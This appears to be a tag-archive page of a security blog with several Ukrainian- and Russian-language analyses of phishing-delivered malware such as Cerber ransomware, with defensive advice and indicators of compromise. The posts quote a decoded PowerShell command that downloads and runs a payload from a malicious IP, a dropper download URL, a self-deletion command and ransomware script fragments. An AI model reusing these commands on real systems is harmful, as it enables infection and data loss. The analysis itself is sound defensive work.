Tag Archive | cyber crime

Цербер який шифрує файли

cerber_pageНовий варіант Cerber Ransomware потрапив мені до рук. Минулого разу я помилково прийняв його за Dridex. Перші зразки Cerber були помічені ще на початку березня. Аналітики відносять його до так званого Ransomware as a Service (RaaS), тобто охочі заробити розповсюджують заразу, а самі автори отримують комісію з кожної транзакції. Механіка роботи наступна – при активації певний перелік файлів шифрується за допомогою алгоритму AES, жертві пропонують сплатити ~ 1,2 BTC ($500) за відновлення доступу до інформації. Через 7 днів сума викупу зростає вдвічі. Сплата проходить через ресурс що розміщений в мережі Tor.

Від інших представників ransomware Цербера відрізняє застосування вбудованого диктора (після шифрування файлів жертві голосом озвучують факт шифрування):

Set SAPI = CreateObject(“SAPI.SpVoice”)
SAPI.Speak “Attention! Attention! Attention!”
For i = 1 to 5
SAPI.Speak “Your documents, photos, databases and other important files have been encrypted!”
Next

Та вибіркову цілеспрямованість. Шифрування не відбувається, якщо скомпрометована система знаходиться у одній з наступних країн:

“blacklist”: {
“countries”: [
“am”, “az”, “by”, “ge”, “kg”, “kz”, “md”, “ru”, “tm”, “tj”, “ua”, “uz”

Саме через цю перевірку я так і не побачив фінальної дії семплу, хоч запускав його по кілька разів на різних системах. Крім того, як можна помітити із першого знімку екрану, автори полюбляють вислів “Quod me non necat me fortiorem facit” що у перекладі з латинської означає “Все у житті, що мене не вбиває, робить мене сильнішим” (Ніцше).

Отже нова версія Cerber має кілька відмінностей:

  • цього разу без PowerShell;
  • його прислали особисто мені;
  • обгортка – файл шаблону (.dotm);
  • інакший зміст UDP пакету.

Давайте розглянемо активність семплу детальніше. Усе починається із фішингового листа:

0_mailІнвойс? Мені? Вау.. Ну давайте поглянемо що в середині:

0dotm_ole_1 0dotm_ole_2При відкритті документу – автозапуск макроса. Сама приманка має наступний вигляд:

0_macroЯкщо жертва активувала макрос, в каталог %AppData% записується .vbs із довільним цифровим іменем, який обробляється системним процесом wscript.exe котрий ініціює з’єднання з файловим сервером з якого уже завантажується основний модуль:

7 8Цікаво, що від активації до завантаження файлів іде затримка 3-4 хвилини. Основний модуль та додаткові файли записуються в %AppData% і керування передається спершу .tmp файлу із довільним цифровим іменем, а вже потім .tmp копіює себе у підкаталог %AppData%\{X-Y-Z-A-AAA}\*.exe :

10Сам Cerber (у даному випадку процес cipher.exe) ініціює розсилку UDP пакетів на діапазони ІР, що належать провайдерам РФ та Германії:udpНа цій стадії семпл ініціював самознищення і видаляв активний компонент (.exe файл). Сам процес шифрування детально розглянутий за посиланням.

# # # # #

Давайте зосередимося на головних моментах:

  1. Написано досить якісно, значить цикл життя таких семплів буде довгим;
  2. Cerber використовує json конфіг файл, що дозволяє швидко адаптувати його до нових умов;
  3. Обгортки можуть відрізнятися, проте сам модуль пишеться і стартує із %AppData%

Для того, щоб захиститися від нових різновидів Цербера та його друзів рекомендую жорсткіше фільтрувати пошту (вирізати макроси із документів) та блокувати створення і запуск .exe із %AppData% – це технічні моменти. Що стосується організаційних, то поради проводити періодичні співбесіди із працівниками та тести на проникнення залишаються в силі.

Іще одне – основна проблема із сучасним фішингом та семплами у тому, що на момент розсилки, вони майже не детектуются звичайними АВ-сканерами. Це підштовхує до застосування пісочниць, або до жорсткого контролю поведінки запущених користувачем процесів на рівні кінцевої точки. Чому так? Погляньте на результати перевірки документу-обгортки та самого payload на момент контакту:

vt_payload_contact vt_dropp_contact

Варіант захисту для користувачів VSE

VSE_AP_appdataВаріант захисту для користувачів Traps (Palo Alto Networks)

traps_rest2 traps_rest1

macro2 powershell

Маркери компрометації:

z43n21v1gs8e2p.dotm SHA1=0a03d6e9b6730a40d922b38b51a7f2344b09cc37

pentnt.exe SHA1=c8f3f0a33efe38e9296ef79552c4cadf6cf0bde6

сервер з якого завантажується payload по 80 TCP = 37.187.37.150

розсилка пакетів “hi005e974” по 6892 UDP = 85.93.0.x

Будьте уважними та обережними при роботі з ІТ.

Будущее — это тщательно обезвреженное настоящее

MV5BMTk3ODUxMjAwNV5BMl5BanBnXkFtZTcwNTg2ODY4Mg@@._V1_SX640_SY720_VR

Advertisements

PowerShell, або “не довго музика та грала..”

PowerShell

Bruce Wayne: Today you get to say “I told you so.”
Alfred: Today, I don’t want to.
(pauses for several moments)
Alfred: But I did bloody tell you.

У минулому дописі я зробив висновок про те, що нові семпли будуть частіше використовувати вбудовані можливості систем (наприклад, PowerShell). Наступного ж дня після публікації мені надіслали зразок ШПЗ який підтвердив мої слова. Давайте поглянемо на нього разом.

I. Вступ (або як усе могло би закінчитися за ~10 хвилин)

Що повинна робити освічена людина у наш непростий час коли вона отримує підозріле приєднання на кшталт Scan_6_10_2016.doc ? Правильна відповідь – в жодному разі не поспішати відкривати його одразу. Тут варто одразу сказати, що користувачеві у скриньку не повинні потрапляти такі файли, позаяк це говорить про те, що в організації немає “пісочниці” (sandbox), а фільтрація поштових приєднань не налагоджена належним чином. Що ж, ми із вами живемо не в ідеальному світі. Відкривши файл жертва побачить наступне:

macro

Замість очікуваного скану документу ми бачимо прохання активувати макрос.. І тут варто би зупинитися і передати файл на аналіз ІТшникам/ІБшникам.. А що у свою чергу має зробити відповідальний співробітник ІТ/ІБ департаменту? Навіть не відкриваючи файл, не витрачаючи часу на запуск тестової віртуальної машини?

Напевне взяти до рук такий шикарний та перевірений інструмент як oletools (вимагають наявності у системі Python 2.x) і за 15-30 секунд отримати відповідь на головне запитання:

scan_test scan_test3 scan_test2

Так, документ містить макрос який викликає PowerShell і передає йому якусь незрозумілу послідовність інструкцій, яка у свою чергу закінчується такою командою:

final = “POWERSHELL.EXE -ExecutionPolicy bypass -noprofile -windowstyle hidden -Enc ” & first

Загалом, наявність макросу та ще й із передачею команд із параметром “Execution Policy bypass” повинна бути яскравим доказом небезпеки, але … може це все ж таки щось “потрібне по роботі”? (сарказм)

Навіть якщо технічний спеціаліст не володіє базовими навичками роботи із Powershell, усього за кілька хвилин він може знайти опис параметра -Enc :

-Enc, -EncodedCommand <Base64EncodedCommand>

Угу, значить наша загадкова послідовність це команди, що були зашифровані у Base64. Витративши іще пару хвилин, скористаймося першим ліпшим онлайн-декодером. І тоді незрозумілі рядки:

first = “UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1…

Перетворяться на цілком чіткі команди:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile(‘http://93.174.94.135/~harvy/verfgt.exe&#8217;, $env:APPDATA\verfgt.exe );Start-Process ( $env:APPDATA\verfgt.exe )

macro_listing2

І на цьому моменті можна було би поставити крапку. Я не жартую. Просто взяти до у ваги адресу поштового серверу, з якого прийшов цей лист; самотужки завантажити шкідливий verfgt.exe; надіслати його аналітикам антивірусу (щоб включили в наступні сигнатури); ще раз перевірити правила, що мають блокувати створення та запуск .exe із каталогів %AppData%; і головне – не забути подякувати користувачеві за його обачність.

Ось і все. Справу закрито – можна розійтися, випити чаю/кави чи чогось міцнішого та обговорити більш важливіші події на теренах кіберпростору..

Але про що я кажу, адже якщо ви досі читаєте ці рядки, то ви тут заради аналізу. Тому перейдемо до наступних кроків. Мені просто закортіло навести приклад того, як би мали реагувати користувачі та відділ СБ/ІБ на подібні листи після стількох випадків атак через фішинг.

II. Основна частина (або як буває у 90% випадків)

Очевидно, що ми маємо справу із бінарною кібер-атакою. Адже документ-приманка є нічим іншим, як представником сімейства W97M/Downloader. Задача приманки – ініціювати процес завантаження та запуск основного модуля (другої частини атаки). В даному випадку приманка залучає PowerShell для прихованого завантаження файлу. Основний же модуль є новою версією ransomware – знайомтесь, Cerber. Цей вид ПШЗ застосовується для шифрування документів з метою отримання викупу за відновлення доступу до інформації. Сам Cerber завантажується і запускається із %AppData% (неважко помітити в деобфускованій частині команд – $env:APPDATA).

те недолуге відчуття, коли тебе нарешті почули, але зовсім не ті до кого ти звертався

Так, вони (автори семплів) змінили тактику і використовують для старту інший каталог із системного оточення. Вочевидь, поради блокувати створення нових .exe файлів у %temp% та їх запуск почали заважати бізнесу тих, хто займається атаками чи написанням семплів. Хоча, про %AppData% я написав вперше коли розбирав CTB Locker – уже більше року тому. Просто майте на увазі, коли формуватимете політики безпеки.

Якщо приманка успішно виконала свою задачу, то на скомпрометованій системі починається така активність:

activate

Файл, який був завантажений PowerShell запускається із %AppData% (для Win8 яка виступала у ролі полігону ця змінна лінкує каталог **\Users\*\AppData\Roaming). Після запуску Dridex копіює своє тіло у окремий каталог в середині AppData\Roaming\ із рандомно згенерованим ім’ям (кожна активація призводить до зміни імені). У мене перший запуск дав таку картинку:

verfgt.exe -> charmap.exe, а другий прохід:

verfgt.exe -> srdelayed.exe.

Після копіювання перший процес додає нащадка в автозавантаження (HKU\CurrentVersion\Run, RunOnce та ControlPanel\Desktop\SCRNSAVE.EXE), здійснює пошук присутніх додатків, завершує та видаляє сам себе (семпл який ми розглядали раніше не мав засобів закріплення і не вмів зачищати свої сліди!):

proc_activiry reg_activity

Батьківський процес завершує і видаляє сам себе такою командою:

/d /c taskkill /t /f /im “verfgt.exe” > NUL & ping -n 1 127.0.0.1 > NUL & del “C:\Users\GK17\AppData\Roaming\verfgt.exe” > NUL

Але перед цим проводить такий пошук:

Searched C:\Documents and Setting s\Administrator\StartMenu\Prog rams\StartUp\*.lnk
Searched C:\Documents and Setting s\Default User\StartMenu\Prog rams\StartUp\*.lnk
Searched C:\WINDOWS\system32\g *s.exe
Searched C:\WINDOWS\system32\o*b.exe
Searched C:\WINDOWS\system32\o*h.exe
Searched C:\WINDOWS\system32\t*s.exe
Searched C:\WINDOWS\system32\y*o.exe

Новостворений нащадок, що розташувався за шляхом *\AppData\Roaming\{xxxxxx}\xxxx.exe встановлює з’єднання із C&C сервером, передає йому IP скомпрометованої системи та готується отримати команди:

tcp

(!) Зверніть увагу:

А ще, цей семпл здійснював розсилку UDP пакетів по діапазону IP адрес, що були закріплені за німецьким провайдером. Зміст пакету = hi03a442e

netwrk

upd

Варто зазначити, що обидві мої тестових полігони семплу здалися підозрілими і він, не отримавши команди зовні через кілька хвилин видалив сам себе. Але це його не врятувало, бо я встиг законспектувати його дії.

III. Висновки (поради та маркери компрометації)

Як і у випадку з Java навряд чи заборона PowerShell буде прийнятною мірою для всіх. Організаціям варто посилити фільтрацію поштових приєднань – блокувати або вирізати активний вміст документів до того, як вони потраплять на очі користувачеві. На рівні кінцевих точок необхідно контролювати, хоча би відстежувати, а краще взагалі блокувати спроби створити та запустити новий .exe файл за шляхами %tmp%\ та %AppData%\. Рекомендації щодо проведення співбесід-тренінгів для користувачів та впровадження періодичних тестів на проникнення залишаються в силі. Також не завадить розглянути можливість застосування “пісочниці” (для забезпечення статичного та динамічного аналізу коду), а на кінцевих точках розгорнути рішення, що дозволить працювати із білими списками (обмежити виконання неавторизлваних скриптів/запускних файлів.

P.S.

Головні висновки, які я зробив для себе під час вівісекції цього семплу:

  1. Вони будуть застосовувати механізми ОС та бізнес-додатки для обходу захисту;
  2. Вони поступово припинять писати payload в %temp%;
  3. Вони стають дедалі обережнішими (перевірка параметрів та самознищення у комплекті) – це значить, якщо адмін або ІБшнік прогавили момент активації, то через 5хв на системі жертви уже може бути пусто (або не підійшла, або уже зібрали необхідні дані);
  4. Сигнатури знов не спрацювали у перші 12 годин активності семплу;
  5. У цьому варіанті Dridex присутній претекст, чого раніше не було. Прохання активувати макроси може бути локалізованим та стилізованим під бланки установ фінансової галузі, що збільшить кількість інфікованих.

Маркери компрометації наведено нижче:

Scan_6_10_2016.doc SHA1=5067a8791ed42cb4e2c8a2637c8d400e54c2b9d1

verfgt.exe SHA1=8bd41d2a41f8a375d3de9fdd84f40f3bb17c5298

сервер з якого завантажується payload по 80 TCP = 93.174.94.135

C&C з яким спілкування іде по 80 TCP = 52.29.28.22

розсилка пакетів “hi03a442e” по 6892 UDP = 85.93.0.x

Будьте уважними та обережними при роботі з ІТ.

“Но раны остаются ранами. Они заживают, рубцуются, и вроде бы ты о них уже забыл вовсе, а потом переменится погода, они и заноют.”

MV5BMTU2OTcwMjA0NV5BMl5BanBnXkFtZTcwODI3MjA5Mg@@._V1_SX640_SY720_

VR

Цільові атаки

У суботу 28-го числа мав честь прийняти участь у конференції Сталевий бубен – X «Безпека».

Розповідав львівській публіці про цільові атаки на українські організації. Був приємно вражений увагою та рівнем знань слухачів.

Доповідь містить приклади фішингових листів та результати активації ШПЗ. Розглянуто практичні рекомендації з посилення захисту.

Контент буде корисним в першу чергу для співробітників ІТ/ІБ департаментів, але не буде зайвим показати кілька слайдів і пересічним користувачам (щоби знали чого варто стерегтися).

Кому не зручно переглядати на slideshare – ось вам pdf (~ 2,3 Mb)

VR

Фишинг + ransomware = Show Must Go On

Очередной “сюрприз” может поджидать ваших сотрудников в почтовом ящике. Давайте посмотрим, как это работает, и что можно сделать, чтобы защититься от потери информации, времени и $.

И так, мы с вами уже препарировали разные виды приманок – от прямолинейного .exe до остроумного .js.

Новый герой нашего времени … RTF с начинкой. А вот и не угадали, макроса тут нет (это было в прошлый раз). Сегодня к нам на вивисекцию поступил документ, который при активации выполняет произвольный код благодаря уязвимости CVE-2015-1641.

Все начинается с фишинга:

email

Как видите, письмо содержит описательную часть (претекст), которая мотивирует наивную жертву посмотреть вложение. Если человек “повелся” и открыл файл, то спустя некоторое время он получит такое:

b1252f

Маркеры компрометации:

Источник:           cpanel.needassistant.com [94.23.190.185]

Тип:                      фишинг + ransomware

Обертка:              письмо с вложением .DOC (реально там RTF + CVE2015-1641)

Активация:          запись .exe в каталог %temp%, коммуникация с C2 через TOR, шифрование файлов

Сетевая активность:

IP:109.120.180.245, Port:443       vps-1065056.srv.pa.infobox.ru

IP:154.35.32.5, Port:443                   faravahar.rabbani.jp

IP:171.25.193.9, Port:80                   ehlo.4711.se

IP:176.9.133.154, Port:110               pascal-schwarz.ch

IP:85.25.138.93, Port:4029              echo357.server4you.de

IP:86.59.21.38, Port:443                  tor.noreply.org [38.21.59.86.in-addr.arpa]

IP:95.211.169.35, Port:443             this-is-a-tor-exit-node.tld

IP:104.81.246.8, Port:80                  akamai

Контрольные суммы:

Документ

File Name

schet1074.02.03.16.doc

MD5 Hash Identifier

02F84519450A403A3FEB5DC523919984

SHA-1 Hash Identifier

C4843C4A549AC1C0C890E4E95D5AA65D542F3D0F

SHA-256 Hash Identifier

CCEC0BFFCC491E776A4E04F55BF860946DF026F6982C9B21D303E4C0BACACCAA

Dropper

File Name

vmsk.exe

MD5 Hash Identifier

BE7C3AAD02F6B230E1E47C6955666C84

SHA-1 Hash Identifier

F41644C208A88076F98DA16AAEB824C66EC3D080

SHA-256 Hash Identifier

8CF6969107DC90A85777764713AAB899CC305F9A4F65A4E40C7EAB656FC9ADAF

Анализ

И так, картинка, которую видит в итоге жертва нам уже знакома, не так ли?

Уже прошло больше года, с тех пор, как мы столкнулись с CTB Locker`ом и его приемниками.

Если резервных копий не было, а информация была ценной – как правило, компании вынуждены платить выкуп.

А теперь, пожалуйста, представьте на минуту, что вместо банального “шифровальшика” сотрудник получает на машину имплант, и не какой-то там open-source, а платный вроде Galileo (вспомним HackingTeam). По сути, сервера рассылок, начинка и С2 – это всего лишь переменные. Канал доставки до сих пор функционирует исправно и в большинстве случаев, сотрудники по неосторожности будут открывать такие вложения..

Но, мы отвлеклись от темы. Если взглянуть внимательнее, то мы увидим то, чего наивная жертва, как правило не замечает – на самом деле, при запуске вложения по уже известному нам пути (%temp%) распаковывается основной dropper:

rtf_3 rtf_2

Вот его активность:

ATD_RTF_exe

ATD_RTF_exe_IP

По логам McAfee ATD видно, что помимо коммуникации с сервером управления основной дроппер создает дополнительный процесс, который в свою очередь проверяет систему, перед тем, как дать “отмашку” на шифрование:

ATD_FTF_2nd_exeATD_FTF_2nd_exe2

Фактически мы получаем привычную схему вымогателя только с иной оберткой.

Советы (да, я буду повторяться):

  1. Осведомленность сотрудников о том, что такое “фишинг” и “соц. инженерия”;
  2. Введения принципа “не касается твоей работы – не открывай”;
  3. Запрет создания и запуска исполняемых файлов и скриптов из директории %temp%;
  4. Проверка вложений перед открытием по VirusTotal либо ВМ;
  5. Использование модуля HIPS либо ENS10.1 (потому что в нем антивирус усилен функциями HIPS`a);
  6. Проведения периодических пентестов (тренингов);
  7. Внедрение решений динамического и  статического анализа документов (McAfee ATD, FireEye, PaloAlto Wildfire)

Будьте предельно внимательны и осторожны при работе с вложениями от незнакомых отправителей.

Он знал, что миллиарды и миллиарды ничего не знают и ничего не хотят знать, а если и узнают, то поужасаются десять минут и снова вернутся на круги своя.

 

vlcsnap-2016-02-14-15h21m46s629

VR

Кібератаки на підприємства України

Короткий аналіз атак, у розслідуванні яких приймав участь.
Аналітика. Маркери компрометації. Рекомендації.

Контент доповіді стосується не лише енергетиків і є актуальним як для підприємств державного сектору так і для бізнесу. Розраховано на широкий загал. В першу чергу – на працівників ІТ/ІБ підрозділів.

Кому не зручно переглядати із slideshare, беріть PDF файл (~1,8 Mb).

Будьте обачними та обережними при роботі з електронною поштою.

VR

Первичный анализ очередного фишинга

Краткий разбор свежего семпла подручными средствами (а-ля сам себе sandbox)

И так, приступим к вивисекции.

Пример письма опубликую как только получу разрешение. Если вдруг кто-то забыл, как выглядит типичный современный фишинг – смотрите пример из предыдущей заметки.

В этот раз героем нашего шоу стал … документ MS Word. Внимательные читатели уже догадались – да, файл содержит макрос. Атакующие настолько обленились, что даже картинку-предупреждение не ставят (мол “цей документ було створено у більш новішій версії … активуйте макроси“). Оно и правильно – зачем напрягаться, если 90% потенциальных жертв и так кликнут и запустят.

Но давайте посмотрим – а что же происходит с теми пользователями, которые по неосторожности/незнанию или халатности активируют макрос?

win7

Я ожидал увидеть стандартный подход – извлечение тела дроппера из макроса в %temp% либо %AppData%, но не сложилось. Я сперва огорчился, а потом воспрянул духом – может это и есть тот самый опасный 0-day и этот макрос заставляет WINWORD.EXE делать всю грязную работу?(ууууу)

Но не тут-то было. Видно работали на скорую руку, потому ограничились тупой загрузкой дроппера с одного из файловых серверов, который хоститься во Франции:

GET hxxp://213.186.33.18/~lelodged/43543r34r/843tf.exe

win7-4

Сам IP файлового сервера находиться в зоне риска по GTI:

Screenshot-213.186.33.18 - IP - McAfee Labs Threat Center - Iceweasel (Private Browsing)

Т.е. если бы был IPS либо NGFW, то на этом шаге все бы и закончилось..

После загрузки и запуска оного получаем уже коннект на C&C, который хостится в Санкт-Петербурге:

843tf.exe >> 62.76.191.108

win7-6win7-8win7-9

А вот IP C&C еще не засвеченный потому по GTI пусто:

Screenshot-62.76.191.108 - IP - McAfee Labs Threat Center - Iceweasel (Private Browsing)

EXE-шник, к слову, уже детектится на конечной точке по GTI

Artemis!BBA6C087E282

На сегодня пока все.

IP адреса и документ с EXEшником переданы куда надо.

Следите за обновлениями.

# # # #

Мораль: обучайте своих пользователей распознавать фишинг. Объясняйте почему не стоит сразу открывать подозрительное вложение. И почему не нужно активировать макросы, даже если очень-очень просят или наоборот не просят.

vlcsnap-2016-01-29-00h17m11s026

VR

паспорт.exe – или чем пытаются ломать ГОСы

safe_mail_sample_Pasport_exe

Received: from smtpout3.timeweb.ru (unknown [92.53.117.25]) …

Received: from [46.20.33.197] (helo=host.de.appvz.com)

                by smtp.timeweb.ru with esmtpa (Exim 4.76)

                (envelope-from <sales@*****.ru>)

# # #

Что будет, если жертва запускает вложение описано в предыдущей заметке.

Будьте внимательны при работе с электронной почтой.

VR